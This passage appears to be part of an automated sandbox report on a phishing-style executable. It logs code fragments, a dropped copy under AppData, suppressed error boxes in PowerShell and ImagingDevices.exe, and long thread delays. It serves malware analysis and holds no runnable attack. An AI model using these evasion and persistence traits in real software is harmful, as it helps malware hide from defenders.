Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D94BE0 push es; iretd	1_2_08D94C03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D90FE2 push cs; retf	1_2_08D90FE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D9314E push ss; retf	1_2_08D93157
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D92314 push ecx; retf	1_2_08D9235D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D92336 push ecx; retf	1_2_08D9235D
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_002F126E push 0464A955h; retf	19_2_002F1287
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_002F24CD push ecx; ret	19_2_002F24E0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE1EE5 push ss; retf	19_2_02EE1EFB
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE1EFC push ss; retf	19_2_02EE1EFB
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE0405 push es; iretd	19_2_02EE0407
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE1E01 push ebp; ret	19_2_02EE1E09
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE0FE2 push cs; retf	19_2_02EE0FE5
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE4BE0 push es; iretd	19_2_02EE4C03
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE314E push ss; retf	19_2_02EE3157
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE2336 push ecx; retf	19_2_02EE235D
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 19_2_02EE2314 push ecx; retf	19_2_02EE235D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Jump to dropped file

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6568	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3194	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Window / User API: threadDelayed 4700	Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

API coverage: 2.6 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 7696	Thread sleep count: 4700 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 7692	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Last function: Thread delayed

